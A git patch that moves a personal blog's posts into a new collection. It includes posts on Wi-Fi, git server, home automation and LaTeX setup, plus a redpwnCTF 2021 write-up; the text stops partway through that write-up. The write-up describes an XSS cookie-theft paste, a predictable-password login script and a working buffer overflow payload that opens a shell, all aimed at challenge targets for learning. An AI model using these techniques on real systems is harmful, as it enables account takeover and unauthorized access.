From 9b4fb13f94bc8fa2f7d50519652bead8ede4ee3a Mon Sep 17 00:00:00 2001 From: Loek Le Blansch Date: Wed, 16 Oct 2024 20:25:27 +0200 Subject: move stuff around --- _config.yml | 8 +- _items/avanswifi.md | 27 ++ _items/connect4.md | 18 + _items/git.md | 164 +++++++++ _items/homeauto.md | 259 +++++++++++++ _items/latex.md | 132 +++++++ _items/redpwn2021.md | 778 ++++++++++++++++++++++++++++++++++++++++ _items/scoop.md | 118 ++++++ _items/software.md | 280 +++++++++++++++ _posts/2021-04-13-software.md | 280 --------------- _posts/2021-04-24-connect4.md | 18 - _posts/2021-04-28-git.md | 164 --------- _posts/2021-07-13-redpwn2021.md | 778 ---------------------------------------- _posts/2021-07-22-scoop.md | 118 ------ _posts/2021-08-17-homeauto.md | 259 ------------- _posts/2021-09-09-avanswifi.md | 27 -- _posts/2022-01-24-latex.md | 132 ------- _sass/globals.css | 15 +- _sass/tags.css | 2 +- index.md | 20 +- search.html | 15 +- 21 files changed, 1819 insertions(+), 1793 deletions(-) create mode 100644 _items/avanswifi.md create mode 100644 _items/connect4.md create mode 100644 _items/git.md create mode 100644 _items/homeauto.md create mode 100644 _items/latex.md create mode 100644 _items/redpwn2021.md create mode 100644 _items/scoop.md create mode 100644 _items/software.md delete mode 100644 _posts/2021-04-13-software.md delete mode 100644 _posts/2021-04-24-connect4.md delete mode 100644 _posts/2021-04-28-git.md delete mode 100644 _posts/2021-07-13-redpwn2021.md delete mode 100644 _posts/2021-07-22-scoop.md delete mode 100644 _posts/2021-08-17-homeauto.md delete mode 100644 _posts/2021-09-09-avanswifi.md delete mode 100644 _posts/2022-01-24-latex.md diff --git a/_config.yml b/_config.yml index 2e1ba16..1c542f1 100644 --- a/_config.yml +++ b/_config.yml @@ -1,17 +1,21 @@ title: "Loek's Blog" domain: blog.pipeframe.xyz -permalink: /post/:title/ exclude: - makefile - license - readme.md +collections: + items: + permalink: /post/:title/ + output: true defaults: - scope: - type: posts + type: items values: layout: default lang: en toc: true + output: true markdown: kramdown sass: style: compressed diff --git a/_items/avanswifi.md b/_items/avanswifi.md new file mode 100644 index 0000000..95cfbfe --- /dev/null +++ b/_items/avanswifi.md @@ -0,0 +1,27 @@ +--- +title: Avans wifi setup +subtitle: How to use Avans eduroam with NetworkManager +tags: + - software +cover: /img/avanswifi.png +--- + +I wasted 2 hours trying to set up my school's WiFi, so here's a quick reference +for other students who might've tried connecting but ended up giving up. + +``` +$ nmcli connection edit type wifi +nmcli> set 802-11-wireless.ssid eduroam +nmcli> set 802-1x.eap peap +nmcli> set 802-1x.phase2-auth mschapv2 +nmcli> set 802-1x.identity +nmcli> set 802-1x.password +nmcli> set wifi-sec.key-mgmt wpa-eap +nmcli> save +nmcli> activate +``` + +Keep in mind that your username isn't your student e-mail, but the first letter +of your first name, and 7 characters from your last name, e.g. `Loek Le +Blansch -> lblansch`. + diff --git a/_items/connect4.md b/_items/connect4.md new file mode 100644 index 0000000..6c5c329 --- /dev/null +++ b/_items/connect4.md @@ -0,0 +1,18 @@ +--- +title: Connect 4 beta live! +tags: + - connect 4 + - beta +cover: /img/connectfourbeta.png +--- + +My connect four website is currently online as a public beta. You can visit the +website at . A list of known bugs is on the +homepage, and all other issues should be submitted to +[GitHub](https://github.com/lonkaars/connect-4/issues). + +If I encounter some very interesing bug that I think deserves it's own blog +post I'll write one about it of course. I have one more week from now to worry +about the connect four website, but after that I'm going to start preparing for +my school exams. + diff --git a/_items/git.md b/_items/git.md new file mode 100644 index 0000000..48de24b --- /dev/null +++ b/_items/git.md @@ -0,0 +1,164 @@ +--- +title: My git setup +subtitle: How I use git on my server +tags: + - git + - server + - software +cover: /img/git.png +--- + +## Overview + +I have two mechanisms set up for accessing my git server. I use gitolite for +ssh access and permission management. I also have cgit set up which generates +html pages for viewing your repositories and also hosts your repositories over +http, or https if you have it set up. + +## SSH Access with gitolite + +Gitolite was a pain in the ass to set up because I didn't understand umasks +before I started trying to set it up. A *umask* is like the opposite of what +you'd enter when running `chmod`. For example: if I run `touch test`, I will +now have a file with the same permissions as `chmod 644`. That looks something +like this: + +```sh +$ touch test +$ ls -l +total bla bla +-rw-r--r-- 1 loek users 0 Apr 28 12:28 test +$ chmod 644 test +$ ls -l +total bla bla +-rw-r--r-- 1 loek users 0 Apr 28 12:28 test +$ # notice the same permissions on the 'test' file +``` + +If I want gitolite to create repositories with default permissions so other +users can read the repositories, I have to set my umask to the opposite of 644. +Here's a quick explanation of `ls -l`'s output: + +```sh +-rw-r--r-- * user group size date time filename +|└┬┘└┬┘└┬┘ +| | | └all users +| | └owner group +| └owner user +└type +``` + +Each digit in a `chmod` command sets the permission for the file owner, file +group, then everyone. That looks something like this: + +```sh +$ chmod 644 test + +decimal: 6 4 4 +binary: 110 100 100 +ls -l: - rw- r-- r-- +``` + +Then we take the opposite of this to get the umask: + +```sh +$ chmod 755 directory -R + +ls -l: d rwx r-x r-x +binary: 000 010 010 +decimal: 0 2 2 +``` + +And now my `.gitolite.rc`: + +```perl +%RC = ( + UMASK => 0022, + ROLES => { + READERS => 1, + WRITERS => 1, + }, + + ENABLE => [ + 'ssh-authkeys', + 'git-config', + 'daemon', + 'gitweb', + ], +); + +1; +``` + +## HTTP(S) Access with cgit + +Cgit is probably the easiest thing to set up. It has great built-in +documentation (`man 5 cgitrc`). Pretty much all configuration is in +`/etc/cgitrc` (css/syntax highlighting isn't in there). The only reason I'm +posting my config here is because for some reason, the order of the options in +cgit's config matters: + +```rc +# +# cgit config +# see cgitrc(5) for details + +cache-size=0 +enable-commit-graph=1 + +css=/cgit.css +logo=/cgit.png + +virtual-root=/ +remove-suffix=1 + +root-title=git :tada: + +## +## List of common mimetypes +## +mimetype.gif=image/gif +mimetype.html=text/html +mimetype.jpg=image/jpeg +mimetype.jpeg=image/jpeg +mimetype.pdf=application/pdf +mimetype.png=image/png +mimetype.svg=image/svg+xml + +# Highlight source code with python pygments-based highlighter +source-filter=/usr/lib/cgit/filters/syntax-highlighting.py + +# Format markdown, restructuredtext, manpages, text files, and html files +# through the right converters +about-filter=/usr/lib/cgit/filters/about-formatting.sh + +## +## Search for these files in the root of the default branch of repositories +## for coming up with the about page: +## +readme=:README.md +readme=:readme.md +readme=:README.rst +readme=:readme.rst +readme=:README.txt +readme=:readme.txt +readme=:README +readme=:readme +readme=:INSTALL.md +readme=:install.md +readme=:INSTALL.mkd +readme=:install.mkd +readme=:INSTALL.rst +readme=:install.rst +readme=:INSTALL.html +readme=:install.html +readme=:INSTALL.htm +readme=:install.htm +readme=:INSTALL.txt +readme=:install.txt +readme=:INSTALL +readme=:install + +scan-path=/mnt/scf/git/repositories +``` + diff --git a/_items/homeauto.md b/_items/homeauto.md new file mode 100644 index 0000000..544cf07 --- /dev/null +++ b/_items/homeauto.md @@ -0,0 +1,259 @@ +--- +title: My home automation adventure +subtitle: How to make your house a shitty utopia +tags: + - home automation + - raspberry pi + - esp8266 + - cc2500 + - microcontrollers + - software + - hardware + - hacking +cover: /img/homeauto.png +--- + +Home automation is cool, but it can also be scary. I want to try to convert my +existing bedroom lights into 'smart' lights that I can control using a home +automation system. + +I've tried two home automation systems so far: homebridge and home assistant. +Homebridge isn't really an automation system. It's meant to add unsupported +devices to *homekit*, but doesn't work with anything other than apple devices. +I've also tried (and am currently using) home assistant. It's a complete +replacement for the homekit ecosystem, and it can do basically anything, as +long as you're patient enough... + +The devices I'm going to try to automate are: + +- A random bluetooth RGB/white lamp I bought a couple years back +- An RGB strip under my bed my mom got me for christmas +- A gen 1 Philips LivingColors lamp from 2008 +- My Toshiba RAS-M10GKV-E2 air conditioning unit + +## Bluetooth RGB lamp + +This lamp is apparently another Chinese product that gets rebranded and sold +under different names. I bought mine as the "[Shada led's +light](http://leds-lightpro.com/node/4368)" (no the apostrophe isn't a typo). + +When scanning for bluetooth devices using `bluetoothctl` on Linux, it shows up +as an LE device called "Beken LED". + +I don't remember what search term I used when searching for it's bluetooth +protocol, but I landed on [this page](https://wiki.fhem.de/wiki/BEKEN_iLedBlub) +from a german website about home automation, where it's called the "BEKEN +iLedBulb". It documents which Bluetooth LE characteristics you need to write to +for the lamp to change color. + +The lamp has both [iOS](https://apps.apple.com/us/app/leds-light/id1058642950) +and +[android](https://play.google.com/store/apps/details?id=com.shada.ledslight&hl=en_US&gl=US) +apps available, though only the iOS app seemed to work. + +### Writing a homebridge plugin + +When I started out with this home automation business, I used homebridge +because I didn't know about home assistant yet. Developing plugins for +homebridge is actually pretty easy (after figuring out [how to get the plugin +to load](https://github.com/homebridge/homebridge/issues/2958)). The +documentation is pretty good, and it has typescript integration for maximum +/comfy/-ness. + +Because HomeKit doesn't support RGBW or RGBWW lights (lights that have both rgb +and dedicated white diodes), I chose to display them as seperate rgb and white +lamps inside the home app. + +[The plugin](https://www.npmjs.com/package/homebridge-beken) is pretty janky, +and requires some manual setup, but it worked very consistently for the single +week I used it for. + +### Converting the homebridge plugin to home assistant + +Now that I could control a single bulb using the home app and siri, I needed +more. The homebridge website allows for turning devices on/off, but doesn't +allow color changes. I also liked the idea of controlling the lights using my +phone, which runs android. + +Home assistant was the solution, so I went ahead and installed [home assistant +core](https://www.home-assistant.io/installation/linux#install-home-assistant-core) +on the Raspberry Pi 3B+ I'm using as a dedicated home automation hub. + +Upon opening it for the first time, I noticed it was much slower than +homebridge, but that's because it was installing a bunch of other stuff in the +background. After waiting for the background tasks to complete, I was greeted +with a very nice web interface. There were also already devices that I could +integrate immediately, like the downstairs chromecasts, and my Jellyfin server. + +Now I had to figure out how to write a plugin for home assistant. There's some +concepts in the home assistant ecosystem that I didn't quite understand, which +made searching where to start harder. + +**Integrations** are like plugins, they allow you to *integrate* an unsupported +device into home assistant. Integrations create **devices** which create +**entities** (device properties). Certain entity types can only be read (like +`sensor`), and others can also be updated / written to (lights). + +The documentation for creating entity integrations is pretty poopy, and I +mostly used other plugins on GitHub as reference material. The home assistant +plugin code is available on +[GitHub](https://github.com/lonkaars/homeassistant-beken) and [my personal git +server](https://git.pipeframe.xyz/lonkaars/homeassistant-beken/about). + +## RGB gamer bed + +I was originally planning to control this strip using IR remote emulation, but +I remembered a friend of mine still had an esp8266 laying around. So I went the +extra mile and wanted to try to create a new driver board for the strip +instead. + +### Opening the original driver + +![](/img/homeauto/controller_original.jpg) + +![](/img/homeauto/opening_controller.jpg) + +![](/img/homeauto/open_controller.jpg) + +![](/img/homeauto/controller_board.jpg) + +### Making a custom driver board + +**I AM NOT AN ELECTRICIAN**. I looked on the internet, and I think this is just +a simple board with some mosfets and flash memory for storing the 6 custom +colors. The mosfets are the 3 big squares labeled Q1, Q2 and Q3. The way the +strip works is it gets +12v though the black wire, and then lights up when you +ground any combination of the red, green, and blue wires. The strip dims using +pulse width modulation. The mosfets act like an electronic switch, and control +the grounding of the colored wires. + +I'm going to salvage the mosfets, and barrel plug from the original driver +board, and resolder them on a perfboard with the esp8266 so I can control them +over WiFi. The schematic I'm using comes from +[instructables](https://www.instructables.com/WiFi-Controlled-RGB-LED-Strip-With-ESP8266/). + +![](/img/homeauto/schematic.png) + +The whole solder job was a complete massacre, and I really don't want to show +it. It does work though, but I had to buy a new soldering station because my +old soldering iron wasn't really fit for soldering small electronics. + +### Beautiful dremel work + +I wanted to use the original enclosure instead of a tupperware container this +time, so I used my dad's dremel to create holes for the esp to fit. + +![](/img/homeauto/shittydremel.png) + +![](/img/homeauto/espfit.png) + +As you can see I did a great job :^) + +The esp is still at the bottom of the case, but getting everything to fit +inside was so hard that I completely forgot to take pictures. So here's a +picture of the finished controller mounted under my bed using two small nails: + +
+ +
Job well done
+
+ +### ESP firmware + +The firmare I wrote for the esp is available on +[GitHub](https://github.com/lonkaars/esp8266-rgbstrip) and [my git +server](https://git.pipeframe.xyz/lonkaars/esp8266-rgbstrip/about), along with +the home assistant plugin +([GitHub](https://github.com/lonkaars/hass-esp8266-rgbstrip), +[cgit](https://git.pipeframe.xyz/lonkaars/hass-esp8266-rgbstrip/about)). I used +the [espressif ESP8266_RTOS_SDK](https://github.com/espressif/ESP8266_RTOS_SDK) +toolchain with gnu make as my build system. + +It just connects to your specified wifi network under your specified hostname, +and listens on port 80 for regular http requests. Here's how to use it without +the home assistant plugin: + +```bash +# get color +curl http://hostname/ + +# set color rrggbb color (hex) +curl -X POST -d "0000ff" http://hostname/ +``` + +Some cool features this firmare has are: + +- Linearly interpolated color transitions with customizable transition and step + duration +- Brightness curve correction (makes difference in brightness more pronounced + at higher brightness levels by using a parabolic curve) + +I'm not sure if the more popular [ESPHome](https://esphome.io/) firmare has +these features, but I wanted to have a go at writing my own firmare anyways. + +### Safety + +Because the esp8266 is a pretty basic microcontroller, it doesn't use https or +ssl for encryption. To protect from people in my house wanting to control my +lights, I used the raspberry pi's onboard wifi module to create a hidden +private isolated wifi network for this, and all future IoT devices in my +bedroom. I'm using `hostapd` to create the wifi network, and `dnsmasq` for +assigning ip addresses and hostname resolution. Here's the config file for +`dnsmasq`: + +``` +no-resolv +interface=wlan0 +dhcp-range=10.0.0.1,10.0.0.16,24h +server=8.8.8.8 +``` + +And here's `hostapd`'s config file: + +```bash +# common settings +interface=wlan0 +driver=nl80211 +ssid=network_name_here +hw_mode=g +channel=1 +macaddr_acl=0 +auth_algs=1 +ignore_broadcast_ssid=1 +wpa=2 +wpa_passphrase=network_password_here +wpa_key_mgmt=WPA-PSK +rsn_pairwise=CCMP + +# raspberry pi 3b+ specific settings +ieee80211n=1 # 802.11n support +wmm_enabled=1 # QoS support +ht_capab=[HT40+][SHORT-GI-20][DSSS_CCK-40] +``` + +Very complicated stuff... + +## Philips LivingColors lamp + +[This](http://www.knutsel.org/2009/01/01/livingcolors-1st-generation/) article +describes all the research that went into reverse-engineering the lamp. + +I ordered a cc2500 wireless transmitter and receiver, but the seller cancelled +the order, and now I have to wait a while longer to get one. I'll update this +article once I've set it up though. + +## Toshiba air conditioning unit + +I created a small daughter board to connect to the raspberry pi's gpio pins, +that has an IR phototransistor and IR blaster. This is so I could record and +replay the IR messages from the remote more easily. + +I've spent a solid two days now trying to use my raspberry pi or arduino uno as +a janky logic analyzer, to capture the IR messages and get the message contents +manually, but I still haven't succeeded. I have however succeeded in frying the +IR LED by giving it +5v backwards without any protection, so that's something I +guess. I'll update this section of the article together with the Philips lamp. + + +To be continued... + diff --git a/_items/latex.md b/_items/latex.md new file mode 100644 index 0000000..11db094 --- /dev/null +++ b/_items/latex.md @@ -0,0 +1,132 @@ +--- +title: My LaTeX setup +subtitle: How to set up a simple LaTeX environment with XeTeX and latexmk +tags: + - software + - latex + - git +cover: /img/latex.png +--- + +I started using LaTeX instead of MS Word about two years ago, and I've never +regretted the decision. I switched out of frustration because Word makes it +really easy to mess up your document structure without you noticing. + +## Cool features LaTeX gets you + +- Automatically numbered figures with references that automatically update +- Really simple bibliography management with `biblatex` +- Packages that help you typeset scientific things like chemistry or physics +- Professional looking output documents with very little effort +- Automation of repetitive things with macros +- It's a plain text format, so it works well with `git` or other version + control software +- Probably more + +## Installation + +This guide is for Arch Linux and it's derivatives, but you can use +[pkgs.org](https://pkgs.org) to find the mentioned packages if they're under a +different name in your distro's package manager. + +### Required packages + +- `biber` +- `texlive-most`, containing: + - `texlive-bibtexextra` + - `texlive-core ` + - `texlive-fontsextra ` + - `texlive-formatsextra` + - `texlive-games` + - `texlive-humanities` + - `texlive-latexextra` + - `texlive-music` + - `texlive-pictures` + - `texlive-pstricks` + - `texlive-publishers` + - `texlive-science` + +tl;dr + +``` +# pacman -S texlive-most biber +``` + +### Force XeTeX compiler with latexmk + +To force latexmk to use the `xelatex` compiler instead of `pdflatex` you can +create `~/.config/latexmk/latexmkrc` with the following content: + +``` +$pdflatex = "xelatex %O %S"; +$pdf_mode = 1; +$dvi_mode = 0; +$postscript_mode = 0; +``` + + +## Hello world + +> I have recently made another repository on my profile for template files, you +> can find it [here on github](https://github.com/lonkaars/templates) or [here +> on git.pipeframe.xyz](https://git.pipeframe.xyz/lonkaars/templates). It +> includes a latex starting point with more commonly used packages, and other +> files I tend to copy from other projects + +LaTeX uses a lot of auxiliary files for compilation, so it's a good idea to +create a new directory for every document. After creating a new directory, +create a .tex file and open it with a text editor. + +```tex +\documentclass[12pt, a4paper, dutch]{article} +\usepackage[margin=1in]{geometry} +\usepackage{babel} + +\bigskipamount=7mm +\medskipamount=4mm +\parindent=0mm + +\begin{document} +Hello world! +\end{document} +``` + +This is the starting point I generally use for all my documents. It uses a4 +paper and 2.54cm margins, which is the default in Word (in Europe). Because +most of my documents are in Dutch, I add the `dutch` option to my document +class, and import the babel package for correct word breaking and built-in +latex heading translations. I also disable paragraph indenting, and modify the +`\bigskip` and `\medskip` distances. + +After creating the .tex file, you can run `latexmk ` to compile +the document. When it's done, you should have a new .pdf file in your directory +with the same name as the .tex file. + +Keep in mind that you can probably install an extension for your text editor to +have it automatically compile and refresh your document for you. If you're +using Visual Studio Code, you can use the [LaTeX +Workshop](https://marketplace.visualstudio.com/items?itemName=James-Yu.latex-workshop) +extension, and for vim I use [vimtex](https://github.com/lervag/vimtex) with +[coc-vimtex](https://github.com/neoclide/coc-vimtex) for +[coc](https://github.com/neoclide/coc.nvim). + +## Notes + +### LaTeX and git + +Because LaTeX creates a lot of temporary files, you should add the following to +your repository's `.gitignore`: + +```gitignore +*.aux +*.bbl +*.bcf +*.blg +*.fdb_latexmk +*.fls +*.log +*.out +*.run.xml +*.synctex.gz +``` + diff --git a/_items/redpwn2021.md b/_items/redpwn2021.md new file mode 100644 index 0000000..df9da29 --- /dev/null +++ b/_items/redpwn2021.md @@ -0,0 +1,778 @@ +--- +title: redpwnCTF 2021 +subtitle: A noob's perspective +tags: + - hacking + - CTF + - writeup +cover: /img/redpwn2021.png +--- + +This is the first 'real' CTF I've participated in. About two weeks ago, a +friend of mine was stuck on some challenges from the Radboud CTF. This was a +closed CTF more geared towards beginners (high school students), and only had a +few challenges which required deeper technical knowledge of web servers and +programming. Willem solved most of the challenges, and I helped solve 3 more. + +Apart from those challenges, basically all my hacking knowledge comes from +computerphile videos, liveoverflow videos and making applications myself. + +> epic announcement!!! +> +> Willem has added explanations of the challenges he solved, so go read them! + +## Challenges + +### web/pastebin-1 + +This challenge is a simple XSS exploit. The website that's vulnerable is +supposed to be a clone of pastebin. I can enter any text into the paste area, +and it will get inserted as HTML code into the website when someone visits the +generated link. + +The challenge has two sites: one with the pastebin clone, and one that visits +any pastebin url as the website administrator. The goal of this challenge is +given by it's description: + +> Ah, the classic pastebin. Can you get the admin's cookies? + +In JS, you can read all cookies without the `HttpOnly` attribute by reading +`document.cookie`. This allows us to read the cookies from the admin's browser, +but now we have to figure out a way to get them sent back to us. + +Luckily, there's a free service called [hookbin](https://hookbin.com/) that +gives you an http endpoint to send anything to, and look at the request +details. + +Combining these two a simple paste can be created: + +```html + +``` + +### crypto/scissor + +I wasn't planning on including this one, but it makes use of the excellent +[CyberChef](https://gchq.github.io/CyberChef/) tool. The flag is given in the +challenge description, and is encrypted using a ceasar/rot13 cipher. A simple +python implementation of this cipher is included with the challenge, but I just +put it into CyberChef and started trying different offsets. + +### rev/wstrings + +> Some strings are wider than normal... + +This challenge has a binary that uses a simple `strcmp` to check the flag. When +running the program, the following output is visible: + +```sh +# ./wstrings +Welcome to flag checker 1.0. +Give me a flag> +``` + +My first stategy was running the `strings` utility on the `wstrings` binary, +but I didn't find the flag. What was interesting to me though was that I also +couldn't find the prompt text... This immediately made me check for other +string encodings. + +Running the `strings` utility with the `-eL` flag tells `strings` to look for +32-bit little-endian encoded strings, and lo and behold the flag shows up! + +This is because ascii strings are less 'wide' than 32-bit strings: + +``` + --- ascii --- + +hex -> 0x68 0x65 0x6c 0x6c 0x6f +str -> h e l l o +``` + +Notice how each character is represented by a single byte each (8 bits) in +ascii, as opposed to 32-bit characters in 32-bit land. + +``` + --- 32-bit land --- + +hex -> 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f +str -> h e l l o +``` + +I think 32-bit strings also have practical use for things like non-English +texts such as Hebrew, Chinese or Japanese. Those characters take up more space +anyways, and you would waste less space by not using unicode escape characters. + +### web/secure + +> Just learned about encryption—now, my website is unhackable! + +This challenge is pretty simple if you know some of JS's quirks. Right at the +top of the file is an sqlite3 expression in JS: + +```js +//////// +db.exec(`INSERT INTO users (username, password) VALUES ( + '${btoa('admin')}', + '${btoa(crypto.randomUUID)}' +)`); +``` + +This section of code immediately jumped out to me because I noticed that +`crypto.randomUUID` wasn't actually being called. + +Because the 'random uuid' is being fed into `btoa()` it becomes a base64 +encoded string. However, `btoa()` also expects a string as input. Because every +object in JS has a `.toString()` method, when you pass it into a function +expecting another type, JS will happily convert it for you without warning. + +This means that the admin's password will always be a base64-encoded version of +`crypto.randomUUID`'s source code. We can get that base64-encoded source code +by running the following in a NodeJS REPL: + +```js +// import file system and crypto modules +var writeFileSync = require('fs').writeFileSync; +var crypto = require('crypto'); + +// write source to file +writeFileSync('./randomUUID.js', btoa(crypto.randomUUID.toString()), 'utf-8'); +``` + +I made a simple shell script that calls cURL with the base64-encoded +parameters, and decodes the url-encoded flag afterwards: + +```sh +#!/bin/sh + +# https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell +function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; } + +urldecode $(curl -sX POST \ + -d "username=$(printf 'admin' | base64)" \ + -d "password=$(cat ./randomUUID.js)" \ + https://secure.mc.ax/login) +``` + +### crypto/baby + +> I want to do an RSA! + +This challenge is breaking RSA. It only works because the `n` parameter is +really small. + +Googling for 'rsa decrypt n e c' yields +[this](https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c) +stackoverflow result, which links to +[dcode.fr](https://www.dcode.fr/rsa-cipher). The only thing left to do is +calculate `p` and `q`, which can be done using [wolfram +alpha](https://wolframalpha.com/). + +### pwn/beginner-generic-pwn-number-0 + +> rob keeps making me write beginner pwn! i'll show him... +> +> `nc mc.ax 31199` + +This was my first interaction with `gdb`. It was.. painful. After begging for +help in the redpwnCTF discord server about another waaaay harder challenge, an +organizer named asphyxia pointed me towards [gef](https://github.com/hugsy/gef) +which single-handedly saved my sanity during the binary exploitation +challenges. + +The first thing I did was use [iaito](https://github.com/radareorg/iaito) to +look at a disassembly graph of the binary. Iaito is a graphical front-end to +the radare2 reverse engineering framework, and I didn't feel like learning two +things at the same time, so that's why I used it. While it's very +user-friendly, I didn't look into reverse engineering tools very much, and +didn't realise that iaito is still in development. Let's just say I ran into +some issues with project saving so I took lots of unnecessary repeated steps. + +After trying to make sense of assembly code after just seeing it for the first +time, I instead decided looking at the source code would be a better idea since +I actually know c. + +```c +#include +#include +#include + +const char *inspirational_messages[] = { + "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"", + "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"", + "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"", +}; + +int main(void) +{ + srand(time(0)); + long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *)); + char heartfelt_message[32]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts(inspirational_messages[inspirational_message_index]); + puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"); + puts("can you write me a heartfelt message to cheer me up? :("); + + gets(heartfelt_message); + + if(inspirational_message_index == -1) { + system("/bin/sh"); + } +} +``` + +After looking at this source things became a lot clearer, because the only +input you can actually control is received from `gets(...);` + +Now comes the hard part: doing it, but in assembly! + +Some resources you should consume before attempting binary exploitation would +be [computerphile's video on buffer +overflows](https://www.youtube.com/watch?v=1S0aBV-Waeo) and +[cheat.sh/gdb](https://cheat.sh/gdb) for some basic gdb commands. The rest of +this section assumes you know the basics of both buffer overflows and gdb. + +First, let's print a disassembly of the `int main()` function: + +``` +(gdb) disas main +Dump of assembler code for function main: + 0x000000000040127c <+134>: call 0x4010a0 + 0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150 + 0x0000000000401288 <+146>: call 0x4010a0 + 0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0 + 0x0000000000401294 <+158>: call 0x4010a0 + 0x0000000000401299 <+163>: lea rax,[rbp-0x30] + 0x000000000040129d <+167>: mov rdi,rax + 0x00000000004012a0 <+170>: call 0x4010f0 + 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff + 0x00000000004012aa <+180>: jne 0x4012b8 + 0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8 + 0x00000000004012b3 <+189>: call 0x4010c0 + 0x00000000004012b8 <+194>: mov eax,0x0 + 0x00000000004012bd <+199>: leave + 0x00000000004012be <+200>: ret +End of assembler dump. +``` + +This isn't the full output from gdb, but only the last few lines. A few things +should immediately stand out: the 3 `` calls, and right after the +call to ``. These are the assembly equivalent of: + +```c +puts(inspirational_messages[inspirational_message_index]); +puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"); +puts("can you write me a heartfelt message to cheer me up? :("); + +gets(heartfelt_message); +``` + +Since I didn't see any reference to a flag file being read, I assumed that the +`system("/bin/sh")` call is our main target, so let's see if we can find that +in our assembly code. There's a call to `` at ``, and +there's other weird `cmp`, `jne` and `lea` instructions before. Let's figure +out what those do! + +After some stackoverflow soul searching, I found out that the `cmp` and `jne` +are assembly instructions for compare, and jump-if-not-equal. They work like +this: + +```asm6502 +; cmp compares what's in the $rbp register to 0xffffffffffffffff +; and turns on the ZERO flag if they're equal + 0x004012a5 <+0>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff + +; jne checks if the ZERO flag is on, +; and if it is it jumps (in this case) to 0x4012b8 +┌--0x004012aa <+1>: jne 0x4012b8 +│; we can safely ignore the `lea` instruction as it doesn't impact our pwn +│ 0x004012ac <+2>: lea rdi,[rip+0xf35] # 0x4021e8 +│ +│; the almighty syscall +│ 0x004012b3 <+3>: call 0x4010c0 +│ +│; from here on the program exits without calling /bin/sh +└->0x004012b8 <+4>: mov eax,0x0 + 0x004012bd <+5>: leave + 0x004012be <+6>: ret +``` + +The program checks if there's `0xffffffffffffffff` in memory `0x8` bytes before +the `$rbp` register. The program allocates 32 bytes of memory for our heartfelt +message, but it continues reading even if our heartfelt message is longer than +32 bytes. Let's see if we can overwrite that register >:) + +Let's set a breakpoint after the `` call in gdb, and run the program +with 40 bytes of `0x61` ('a') + +``` +(gdb) break *0x00000000004012a5 +Breakpoint 1 at 0x4012a5 + +(gdb) run < <(python3 -c "print('a' * 40)") +``` + +I'm using the `run` command with `<` and `<()` to pipe the output of python +into the program's `stdin`. It's unnecessary at this stage because there's an +'a' key on my keyboard, but if we were to send raw bytes, this would make it a +lot easier. + +I'm also using [gef](https://github.com/hugsy/gef) so I get access to a command +called `context` which prints all sorts of information about registers, the +stack and a small disassembly window. I won't show it's output here, but it +was an indispensable tool that you should install nonetheless. + +Let's print the memory at `[$rbp - 0x8]`: + +``` +(gdb) x/8gx $rbp - 0x8 +0x7fffffffd758: 0x0000000000000000 0x0000000000000000 +0x7fffffffd768: 0x00007ffff7de4b25 0x00007fffffffd858 +0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 +0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 +``` + +Hmmm, no overwriteage yet. Let's try 56 bytes instead: + +``` +(gdb) run < <(python3 -c "print('a' * 56)") +(gdb) x/8gx $rbp - 0x8 +0x7fffffffd758: 0x6161616161616161 0x6161616161616161 +0x7fffffffd768: 0x00007ffff7de4b00 0x00007fffffffd858 +0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 +0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 +(gdb) x/1gx $rbp - 0x8 +0x7fffffffd758: 0x6161616161616161 +``` + +Jackpot! We've overwritten 16 bytes of the address that the `cmp` instruction +reads. Let's try setting it to `0xff` instead, so we get a shell. Python 3 is +not that great for binary exploitation, so the code for this is a little bit +ugly, but if it works, it works! + +``` +(gdb) run < <(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)") +(gdb) x/1gx $rbp - 0x8 +0x7fffffffd758: 0xffffffffffffffff +``` + +Now let's let execution continue as normal by using the `continue` command: + +``` +(gdb) continue +Continuing. +[Detaching after vfork from child process 22950] +[Inferior 1 (process 22947) exited normally] +``` + +This might seem underwhelming, but our explit works! A child process was +spawned, and as a bonus, we didn't get any segmentation faults! The reason we +don't get an interactive shell is because we used python to pipe input into the +program which makes it non-interactive. + +At this point I was about 12 hours in of straight gdb hell, and I was very +happy to see this shell. After discovering this, I immediately tried it outside +the debugger and was dissapointed to see that my exploit didn't work. After a +small panick attack I found out this was because of my environment variables. +You can launch an environment-less shell by using the `env -i sh` command: + +``` +λ generic → λ git master* → env -i sh +sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0 +"𝘭𝘦𝘵𝘴 